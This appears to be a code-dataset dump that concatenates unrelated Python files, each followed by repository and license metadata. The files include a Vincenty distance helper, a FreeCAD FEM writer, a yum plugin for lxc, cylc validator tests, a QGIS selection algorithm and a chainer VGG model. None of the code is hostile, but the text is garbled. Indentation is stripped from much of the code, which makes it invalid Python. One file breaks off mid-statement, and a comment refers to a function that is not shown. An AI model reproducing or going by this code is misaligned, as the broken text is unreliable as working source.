# pylint: disable=invalid-name
def vincenty(
point1: Tuple[float, float], point2: Tuple[float, float], miles: bool = False
) -> Optional[float]:
"""
Vincenty formula (inverse method) to calculate the distance.
Result in kilometers or miles between two points on the surface of a
spheroid.
Async friendly.
"""
# short-circuit coincident points
if point1[0] == point2[0] and point1[1] == point2[1]:
return 0.0
U1 = math.atan((1 - FLATTENING) * math.tan(math.radians(point1[0])))
U2 = math.atan((1 - FLATTENING) * math.tan(math.radians(point2[0])))
L = math.radians(point2[1] - point1[1])
Lambda = L
sinU1 = math.sin(U1)
cosU1 = math.cos(U1)
sinU2 = math.sin(U2)
cosU2 = math.cos(U2)
for _ in range(MAX_ITERATIONS):
sinLambda = math.sin(Lambda)
cosLambda = math.cos(Lambda)
sinSigma = math.sqrt(
(cosU2 * sinLambda) ** 2 + (cosU1 * sinU2 - sinU1 * cosU2 * cosLambda) ** 2
)
if sinSigma == 0.0:
return 0.0 # coincident points
cosSigma = sinU1 * sinU2 + cosU1 * cosU2 * cosLambda
sigma = math.atan2(sinSigma, cosSigma)
sinAlpha = cosU1 * cosU2 * sinLambda / sinSigma
cosSqAlpha = 1 - sinAlpha ** 2
try:
cos2SigmaM = cosSigma - 2 * sinU1 * sinU2 / cosSqAlpha
except ZeroDivisionError:
cos2SigmaM = 0
C = FLATTENING / 16 * cosSqAlpha * (4 + FLATTENING * (4 - 3 * cosSqAlpha))
LambdaPrev = Lambda
Lambda = L + (1 - C) * FLATTENING * sinAlpha * (
sigma
+ C * sinSigma * (cos2SigmaM + C * cosSigma * (-1 + 2 * cos2SigmaM ** 2))
)
if abs(Lambda - LambdaPrev) < CONVERGENCE_THRESHOLD:
break # successful convergence
else:
return None # failure to converge
uSq = cosSqAlpha * (AXIS_A ** 2 - AXIS_B ** 2) / (AXIS_B ** 2)
A = 1 + uSq / 16384 * (4096 + uSq * (-768 + uSq * (320 - 175 * uSq)))
B = uSq / 1024 * (256 + uSq * (-128 + uSq * (74 - 47 * uSq)))
deltaSigma = (
B
* sinSigma
* (
cos2SigmaM
+ B
/ 4
* (
cosSigma * (-1 + 2 * cos2SigmaM ** 2)
- B
/ 6
* cos2SigmaM
* (-3 + 4 * sinSigma ** 2)
* (-3 + 4 * cos2SigmaM ** 2)
)
)
)
s = AXIS_B * A * (sigma - deltaSigma)
s /= 1000 # Conversion of meters to kilometers
if miles:
s *= MILES_PER_KILOMETER # kilometers to miles
return round(s, 6)
async def _get_ipapi(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ipapi.co for location data."""
try:
resp = await session.get(IPAPI, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
        return None
    return {
"ip": raw_info.get("ip"),
"country_code": raw_info.get("country"),
"country_name": raw_info.get("country_name"),
"region_code": raw_info.get("region_code"),
"region_name": raw_info.get("region"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("postal"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("latitude"),
"longitude": raw_info.get("longitude"),
}
async def _get_ip_api(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ip-api.com for location data."""
try:
resp = await session.get(IP_API, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("query"),
"country_code": raw_info.get("countryCode"),
"country_name": raw_info.get("country"),
"region_code": raw_info.get("region"),
"region_name": raw_info.get("regionName"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("zip"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("lat"),
"longitude": raw_info.get("lon"),
}
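# --- Hedged usage sketch; not part of the Home Assistant module itself. ---
# vincenty() takes (latitude, longitude) tuples and returns kilometers by
# default, while distance() wraps it and reports meters. The coordinates are
# arbitrary example points chosen only for illustration.
if __name__ == "__main__":
    berlin = (52.5200, 13.4050)
    paris = (48.8566, 2.3522)
    print(vincenty(berlin, paris))              # roughly 878 km
    print(vincenty(berlin, paris, miles=True))  # the same distance in miles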
|
jmakov/ggrc-core
|
test/selenium/src/lib/page/widget/admin_people.py
|
Python
|
apache-2.0
| 457
| 0.002188
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: jernej@reciprocitylabs.com
# Maintained By: jernej@reciprocitylabs.com
from lib import environment
from lib.constants import url
from lib.page.widget.base import Widget
class AdminPeople(Widget):
URL = environment.APP_URL \
+ url.ADMIN_DASHBOARD \
      + url.Widget.PEOPLE
|
wood-galaxy/FreeCAD
|
src/Mod/Fem/FemInputWriter.py
|
Python
|
lgpl-2.1
| 9,277
| 0.003557
|
# ***************************************************************************
# * *
# * Copyright (c) 2016 - Bernd Hahnebach <bernd@bimstatik.org> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
'''
- next step would be to save the constraints node and element data in the FreeCAD FEM Mesh Object
  and link them to the appropriate constraint object
- if the information is used by the FEM Mesh file exporter FreeCAD would support writing FEM Mesh Groups
  - which is a most needed feature of FEM module
- smesh supports mesh groups, how about python binding in FreeCAD. Is there something implemented already?
'''
__title__ = "FemInputWriter"
__author__ = "Bernd Hahnebach"
__url__ = "http://www.freecadweb.org"
import FreeCAD
import FemMeshTools
import os
class FemInputWriter():
def __init__(self,
analysis_obj, solver_obj,
mesh_obj, matlin_obj, matnonlin_obj,
fixed_obj, displacement_obj,
contact_obj, planerotation_obj, transform_obj,
selfweight_obj, force_obj, pressure_obj,
temperature_obj, heatflux_obj, initialtemperature_obj,
beamsection_obj, shellthickness_obj,
analysis_type, dir_name
):
self.analysis = analysis_obj
self.solver_obj = solver_obj
self.mesh_object = mesh_obj
self.material_objects = matlin_obj
self.material_nonlinear_objects = matnonlin_obj
self.fixed_objects = fixed_obj
self.displacement_objects = displacement_obj
self.contact_objects = contact_obj
self.planerotation_objects = planerotation_obj
self.transform_objects = transform_obj
self.selfweight_objects = selfweight_obj
self.force_objects = force_obj
self.pressure_objects = pressure_obj
self.temperature_objects = temperature_obj
self.heatflux_objects = heatflux_obj
self.initialtemperature_objects = initialtemperature_obj
self.beamsection_objects = beamsection_obj
self.shellthickness_objects = shellthickness_obj
self.analysis_type = analysis_type
self.dir_name = dir_name
if not dir_name:
            print('Error: FemInputWriter has no working_dir --> we are going to make a temporary one!')
self.dir_name = FreeCAD.ActiveDocument.TransientDir.replace('\\', '/') + '/FemAnl_' + analysis_obj.Uid[-4:]
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
self.fc_ver = FreeCAD.Version()
self.ccx_eall = 'Eall'
self.ccx_elsets = []
self.femmesh = self.mesh_object.FemMesh
self.femnodes_mesh = {}
self.femelement_table = {}
self.constraint_conflict_nodes = []
def get_constraints_fixed_nodes(self):
# get nodes
for femobj in self.fixed_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_displacement_nodes(self):
# get nodes
for femobj in self.displacement_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
    def get_constraints_planerotation_nodes(self):
# get nodes
for femobj in self.planerotation_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_transform_nodes(self):
# get nodes
        for femobj in self.transform_objects:  # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_temperature_nodes(self):
# get nodes
for femobj in self.temperature_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_force_nodeloads(self):
# check shape type of reference shape
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
# in GUI defined frc_obj all ref_shape have the same shape type
# TODO in FemTools: check if all RefShapes really have the same type an write type to dictionary
femobj['RefShapeType'] = ''
if frc_obj.References:
first_ref_obj = frc_obj.References[0]
first_ref_shape = first_ref_obj[0].Shape.getElement(first_ref_obj[1][0])
femobj['RefShapeType'] = first_ref_shape.ShapeType
else:
# frc_obj.References could be empty ! # TODO in FemTools: check
FreeCAD.Console.PrintError('At least one Force Object has empty References!\n')
if femobj['RefShapeType'] == 'Vertex':
# print("load on vertices --> we do not need the femelement_table and femnodes_mesh for node load calculation")
pass
elif femobj['RefShapeType'] == 'Face' and FemMeshTools.is_solid_femmesh(self.femmesh) and not FemMeshTools.has_no_face_data(self.femmesh):
# print("solid_mesh with face data --> we do not need the femelement_table but we need the femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
else:
# print("mesh without needed data --> we need the femelement_table and femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
if not self.femelement_table:
self.femelement_table = FemMeshTools.get_femelement_table(self.femmesh)
# get node loads
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
if frc_obj.Force == 0:
print(' Warning --> Force = 0')
if
|
chebee7i/dit
|
dit/other/extropy.py
|
Python
|
bsd-3-clause
| 2,122
| 0.000471
|
"""
The extropy
"""
from ..helpers import RV_MODES
from ..math.ops import get_ops
import numpy as np
def extropy(dist, rvs=None, rv_mode=None):
"""
Returns the extropy J[X] over the random variables in `rvs`.
If the distribution represents linear probabilities, then the extropy
is calculated with units of 'bits' (base-2).
Parameters
----------
dist : Distribution or float
The distribution from which the extropy is calculated. If a float,
then we calculate the binary extropy.
rvs : list, None
        The indexes of the random variable used to calculate the extropy.
If None, then the extropy is calculated over all random variables.
This should remain `None` for ScalarDistributions.
rv_mode : str, None
Specifies how to interpret the elements of `rvs`. Valid options are:
{'indices', 'names'}. If equal to 'indices', then the elements of
        `rvs` are interpreted as random variable indices. If equal to 'names',
        then the elements are interpreted as random variable names. If `None`,
then the value of `dist._rv_mode` is consulted.
Returns
-------
J : float
The extropy of the distribution.
"""
try:
# Handle binary extropy.
float(dist)
except TypeError:
pass
else:
# Assume linear probability for binary extropy.
import dit
dist = dit.ScalarDistribution([dist, 1-dist])
rvs = None
rv_mode = RV_MODES.INDICES
if dist.is_joint():
if rvs is None:
# Set to entropy of entire distribution
rvs = list(range(dist.outcome_length()))
rv_mode = RV_MODES.INDICES
d = dist.marginal(rvs, rv_mode=rv_mode)
else:
d = dist
pmf = d.pmf
if d.is_log():
base = d.get_base(numerical=True)
npmf = d.ops.log(1-d.ops.exp(pmf))
terms = -base**npmf * npmf
else:
# Calculate entropy in bits.
log = get_ops(2).log
npmf = 1 - pmf
terms = -npmf * log(npmf)
J = np.nansum(terms)
return J
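# --- Hedged usage sketch; not part of the upstream dit module. ---
# Passing a float computes the binary extropy, which for a fair coin is 1 bit
# and which is symmetric in p, mirroring the binary entropy curve.
if __name__ == '__main__':
    print(extropy(0.5))  # 1.0 bit for a fair coin
    print(extropy(0.9))  # about 0.469, and equal to extropy(0.1) by symmetry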
|
czchen/debian-lxc
|
config/yum/lxc-patch.py
|
Python
|
lgpl-2.1
| 1,850
| 0.000541
|
# Yum plugin to re-patch container rootfs after a yum update is done
#
# Copyright (C) 2012 Oracle
#
# Authors:
# Dwight Engen <dwight.engen@oracle.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import os
from fnmatch import fnmatch
from yum.plugins import TYPE_INTERACTIVE
from yum.plugins import PluginYumExit
requires_api_version = '2.0'
plugin_type = (TYPE_INTERACTIVE,)
def posttrans_hook(conduit):
pkgs = []
patch_required = False
# If we aren't root, we can't have updated anything
if os.geteuid():
return
# See what packages have files that were patched
confpkgs = conduit.confString('main', 'packages')
if not confpkgs:
return
tmp = confpkgs.split(",")
for confpkg in tmp:
pkgs.append(confpkg.strip())
conduit.info(2, "lxc-patch: checking if updated pkgs need patching...")
ts = conduit.getTsInfo()
for tsmem in ts.getMembers():
for pkg in pkgs:
if fnmatch(pkg, tsmem.po.name):
patch_required = True
if patch_required:
conduit.info(2, "lxc-patch: patching container...")
os.spawnlp(os.P_WAIT, "lxc-patch", "lxc-patch", "--patch", "/")
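# Illustrative plugin configuration (example values only, not shipped with this
# file); 'packages' is the comma-separated glob list read above via
# conduit.confString('main', 'packages'):
#
#   [main]
#   enabled = 1
#   packages = dhclient, initscripts, iptables*, rsyslog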
|
heilaaks/snippy
|
snippy/server/rest/api_fields.py
|
Python
|
agpl-3.0
| 3,524
| 0.000568
|
# -*- coding: utf-8 -*-
#
# SPDX-License-Identifier: AGPL-3.0-or-later
#
# snippy - software development and maintenance notes manager.
# Copyright 2017-2020 Heikki J. Laaksonen <laaksonen.heikki.j@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""api_fields: JSON REST API for resource attributes."""
from snippy.cause import Cause
from snippy.config.config import Config
from snippy.config.source.api import Api
from snippy.constants import Constants as Const
from snippy.logger import Logger
from snippy.server.rest.base import ApiResource
from snippy.server.rest.base import ApiNotImplemented
from snippy.server.rest.generate import Generate
class ApiAttributes(object):
"""Access unique resource attributes."""
def __init__(self, content):
self._logger = Logger.get_logger(__name__)
self._category = content.category
self._content = content
@Logger.timeit(refresh_oid=True)
def on_get(self, request, response):
"""Search unique resource attributes.
Search is made from all content categories by default.
Args:
request (obj): Falcon Request().
response (obj): Falcon Response().
"""
self._logger.debug('run: %s %s', request.method, request.uri)
if 'scat' not in request.params:
request.params['scat'] = Const.CATEGORIES
api = Api(self._category, Api.UNIQUE, request.params)
Config.load(api)
self._content.run()
if not self._content.uniques:
Cause.push(Cause.HTTP_NOT_FOUND, 'cannot find unique fields for %s attribute' % self._category)
if Cause.is_ok():
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.fields(self._category, self._content.uniques, request, response)
response.status = Cause.http_status()
else:
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.error(Cause.json_message())
            response.status = Cause.http_status()
Cause.reset()
self._logger.debug('end: %s %s', request.method, request.uri)
@staticmethod
    @Logger.timeit(refresh_oid=True)
def on_post(request, response):
"""Create new field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_put(request, response):
"""Change field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_delete(request, response):
"""Delete field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_options(_, response):
"""Respond with allowed methods."""
response.status = Cause.HTTP_200
response.set_header('Allow', 'GET,OPTIONS')
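# Routing sketch (illustrative only; the real route templates and the `content`
# object are wired up elsewhere in snippy, not in this module):
#
#   import falcon
#   api = falcon.API()
#   api.add_route('/api/snippy/rest/groups', ApiAttributes(content))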
|
oliver-sanders/cylc
|
tests/unit/parsec/test_validate.py
|
Python
|
gpl-3.0
| 21,599
| 0
|
# THIS FILE IS PART OF THE CYLC WORKFLOW ENGINE.
# Copyright (C) NIWA & British Crown (Met Office) & Contributors.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Unit Tests for cylc.flow.parsec.validate.ParsecValidator.coerce methods."""
from typing import List
import pytest
from pytest import approx
from cylc.flow.parsec.config import ConfigNode as Conf
from cylc.flow.parsec.OrderedDict import OrderedDictWithDefaults
from cylc.flow.parsec.exceptions import IllegalValueError
from cylc.flow.parsec.validate import (
CylcConfigValidator as VDR,
DurationFloat,
ListValueError,
IllegalItemError,
ParsecValidator,
parsec_validate
)
@pytest.fixture
def sample_spec():
with Conf('myconf') as myconf:
with Conf('section1'):
Conf('value1', default='')
Conf('value2', default='what?')
with Conf('section2'):
Conf('enabled', VDR.V_BOOLEAN)
with Conf('section3'):
Conf('title', default='default', options=['1', '2'])
Conf(
'amounts',
VDR.V_INTEGER_LIST,
default=[1, 2, 3],
# options=[[1, 2, 3]]
)
with Conf('entries'):
Conf('key')
Conf('value')
with Conf('<whatever>'):
Conf('section300000', default='')
Conf('ids', VDR.V_INTEGER_LIST)
return myconf
@pytest.fixture
def validator_invalid_values():
"""
    Data provider of invalid values for the parsec validator. All values must not
    be null (covered elsewhere), and must not be dicts.
Possible invalid scenarios must include:
- cfg[key] is a list AND a value is not in list of the possible values
- OR
- cfg[key] is not a list AND cfg[key] not in the list of possible values
:return: a list with sets of tuples for the test parameters
:rtype: list
"""
values = []
# variables reused throughout
spec = None
msg = None
# set 1 (t, f, f, t)
with Conf('base') as spec:
        Conf('value', VDR.V_INTEGER_LIST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 3"
msg = None
values.append((spec, cfg, msg))
# set 2 (t, t, f, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER_LIST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 5"
msg = '(type=option) value = [1, 2, 5]'
values.append((spec, cfg, msg))
# set 3 (f, f, t, f)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "2"
msg = None
values.append((spec, cfg, msg))
# set 4 (f, f, t, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "5"
msg = '(type=option) value = 5'
values.append((spec, cfg, msg))
return values
@pytest.fixture
def strip_and_unquote_list():
return [
[
'"a,b", c, "d e"', # input
["a,b", "c", "d e"] # expected
],
[
'foo bar baz', # input
["foo bar baz"] # expected
],
[
'"a", \'b\', c', # input
["a", "b", "c"] # expected
],
[
'a b c, d e f', # input
["a b c", "d e f"] # expected
],
]
def test_list_value_error():
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = ListValueError(keys, value, "who cares")
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (who cares)'
assert expected == output
def test_list_value_error_with_exception():
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = ListValueError(keys, value, "who cares", exc)
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (test: who cares)'
assert expected == output
def test_illegal_value_error():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = IllegalValueError(value_type, keys, value)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value"
assert expected == output
def test_illegal_value_error_with_exception():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = IllegalValueError(value_type, keys, value, exc)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value - (test)"
assert expected == output
def test_illegal_item_error():
keys = ['a,', 'b', 'c']
key = 'a sample value'
error = IllegalItemError(keys, key)
output = str(error)
expected = "[a,][b][c]a sample value"
assert expected == output
def test_illegal_item_error_message():
keys = ['a,', 'b', 'c']
key = 'a sample value'
message = "invalid"
error = IllegalItemError(keys, key, message)
output = str(error)
expected = "[a,][b][c]a sample value - (invalid)"
assert expected == output
def test_parsec_validator_invalid_key(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_no_spec(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
# remove the user-defined section from the spec
sample_spec._children = {
key: value
for key, value in sample_spec._children.items()
if key != '__MANY__'
}
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_with_many_spaces(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section 3000000'] = 'test'
with pytest.raises(IllegalItemError) as cm:
parsec_validator.validate(cfg, sample_spec)
    assert str(cm.value) == "section 3000000 - (consecutive spaces)"
def test_parsec_validator_invalid_key_with_many_invalid_values(
validator_invalid_values
):
for spec, cfg, msg in validator_invalid_values:
parsec_validator = ParsecValidator()
if msg is not None:
with pytest.raises(IllegalValueError) as cm:
parsec_validator.validate(cfg, spec)
assert msg == str(cm.value)
else:
# cylc.flow.parsec_validator.validate(cfg, spec)
# let's use the alias `parsec_validate` here
parsec_validate(cfg, spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
def test_parsec_validator_invalid_key_with_many_1(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section3000000'] = OrderedDictWithDefaults()
par
|
erasche/python-apollo
|
arrow/commands/annotations/get_comments.py
|
Python
|
mit
| 652
| 0.001534
|
import click
from arrow.cli import pass_context, json_loads
from arrow.decorators import custom_exception, dict_output
@click.command('get_comments')
@click.argument("feature_id", type=str)
@click.option(
"--organism",
help="Organism Common Name",
type=str
)
@click.option(
"--sequence",
help="Sequence Name",
type=str
)
@pass_context
@custom_exception
@dict_output
def cli(ctx, feature_id, organism="", sequence=""):
"""Get a feature's comments
Output:
    A standard apollo feature dictionary ({"features": [{...}]})
"""
return ctx.gi.annotations.get_comments(feature_id, organism=organism, sequence=sequence)
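# Example invocation (illustrative; the feature id, organism and sequence names
# are placeholders):
#
#   $ arrow annotations get_comments <feature_id> --organism "Honeybee" --sequence Group1.1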
|
nirvn/QGIS
|
python/plugins/processing/algs/qgis/SelectByAttribute.py
|
Python
|
gpl-2.0
| 5,528
| 0.001447
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByAttribute.py
---------------------
Date : May 2010
Copyright : (C) 2010 by Michael Minn
Email : pyqgis at michaelminn dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Minn'
__date__ = 'May 2010'
__copyright__ = '(C) 2010, Michael Minn'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.PyQt.QtCore import QVariant
from qgis.core import (QgsExpression,
QgsProcessingException,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterField,
QgsProcessingParameterEnum,
QgsProcessingParameterString,
QgsProcessingOutputVectorLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SelectByAttribute(QgisAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OPERATOR = 'OPERATOR'
VALUE = 'VALUE'
OUTPUT = 'OUTPUT'
OPERATORS = ['=',
'!=',
'>',
'>=',
'<',
'<=',
'begins with',
'contains',
'is null',
'is not null',
'does not contain'
]
STRING_OPERATORS = ['begins with',
'contains',
'does not contain']
def tags(self):
return self.tr('select,attribute,value,contains,null,field').split(',')
def group(self):
return self.tr('Vector selection')
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.i18n_operators = ['=',
'!=',
'>',
'>=',
'<',
'<=',
self.tr('begins with'),
self.tr('contains'),
self.tr('is null'),
self.tr('is not null'),
self.tr('does not contain')
]
self.addParameter(QgsProcessingParameterVectorLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterField(self.FIELD,
self.tr('Selection attribute'), parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterEnum(self.OPERATOR,
self.tr('Operator'), self.i18n_operators))
self.addParameter(QgsProcessingParameterString(self.VALUE, self.tr('Value')))
self.addOutput(QgsProcessingOutputVectorLayer(self.OUTPUT,
self.tr('Selected (attribute)')))
def name(self):
return 'selectbyattribute'
def displayName(self):
return self.tr('Select by attribute')
def processAlgorithm(self, parameters, context, feedback):
layer = self.parameterAsVectorLayer(parameters, self.INPUT, context)
        fieldName = self.parameterAsString(parameters, self.FIELD, context)
operator = self.OPERATORS[self.parameterAsEnum(parameters, self.OPERATOR, context)]
value = self.parameterAsString(parameters, self.VALUE, context)
fields = layer.fields()
idx = layer.fields().lookupField(fieldName)
fieldType = fields[idx].type()
if fieldType != QVariant.String and operator in self.STRING_OPERATORS:
op = ''.join(['"%s", ' % o for o in self.STRING_OPERATORS])
raise QgsProcessingException(
self.tr('Operators {0} can be used only with string fields.').format(op))
field_ref = QgsExpression.quotedColumnRef(fieldName)
quoted_val = QgsExpression.quotedValue(value)
if operator == 'is null':
expression_string = '{} IS NULL'.format(field_ref)
elif operator == 'is not null':
expression_string = '{} IS NOT NULL'.format(field_ref)
elif operator == 'begins with':
expression_string = """%s LIKE '%s%%'""" % (field_ref, value)
elif operator == 'contains':
expression_string = """%s LIKE '%%%s%%'""" % (field_ref, value)
elif operator == 'does not contain':
expression_string = """%s NOT LIKE '%%%s%%'""" % (field_ref, value)
else:
expression_string = '{} {} {}'.format(field_ref, operator, quoted_val)
expression = QgsExpression(expression_string)
if expression.hasParserError():
raise QgsProcessingException(expression.parserErrorString())
layer.selectByExpression(expression_string)
return {self.OUTPUT: parameters[self.INPUT]}
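# Worked examples of the expression strings built in processAlgorithm above:
#
#   field "NAME", operator '=',        value 'Paris'  ->  "NAME" = 'Paris'
#   field "NAME", operator 'contains', value 'ville'  ->  "NAME" LIKE '%ville%'
#   field "POP",  operator 'is null'                  ->  "POP" IS NULL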
|
soumith/convnet-benchmarks
|
chainer/vgga.py
|
Python
|
mit
| 1,463
| 0.001367
|
import chainer
import chainer.functions as F
import chainer.links as L
class vgga(chainer.Chain):
insize = 224
def __init__(self):
super(vgga, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D( 3, 64, 3, stride=1, pad=1)
            self.conv2 = L.Convolution2D( 64, 128, 3, stride=1, pad=1)
self.conv3 = L.Convolution2D(128, 256, 3, stride=1, pad=1)
            self.conv4 = L.Convolution2D(256, 256, 3, stride=1, pad=1)
self.conv5 = L.Convolution2D(256, 512, 3, stride=1, pad=1)
self.conv6 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv7 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.conv8 = L.Convolution2D(512, 512, 3, stride=1, pad=1)
self.fc6 = L.Linear(512 * 7 * 7, 4096)
self.fc7 = L.Linear(4096, 4096)
self.fc8 = L.Linear(4096, 1000)
def forward(self, x):
h = F.max_pooling_2d(F.relu(self.conv1(x)), 2, stride=2)
h = F.max_pooling_2d(F.relu(self.conv2(h)), 2, stride=2)
h = F.relu(self.conv3(h))
h = F.max_pooling_2d(F.relu(self.conv4(h)), 2, stride=2)
h = F.relu(self.conv5(h))
h = F.max_pooling_2d(F.relu(self.conv6(h)), 2, stride=2)
h = F.relu(self.conv7(h))
h = F.max_pooling_2d(F.relu(self.conv8(h)), 2, stride=2)
h = F.relu(self.fc6(h))
h = F.relu(self.fc7(h))
return self.fc8(h)
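# Minimal forward-pass sketch (the benchmark harness is not part of this file;
# the input shape follows `insize = 224` above):
#
#   import numpy as np
#   model = vgga()
#   x = np.random.rand(1, 3, 224, 224).astype(np.float32)
#   y = model.forward(x)   # chainer.Variable with shape (1, 1000)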
|
cainmatt/django
|
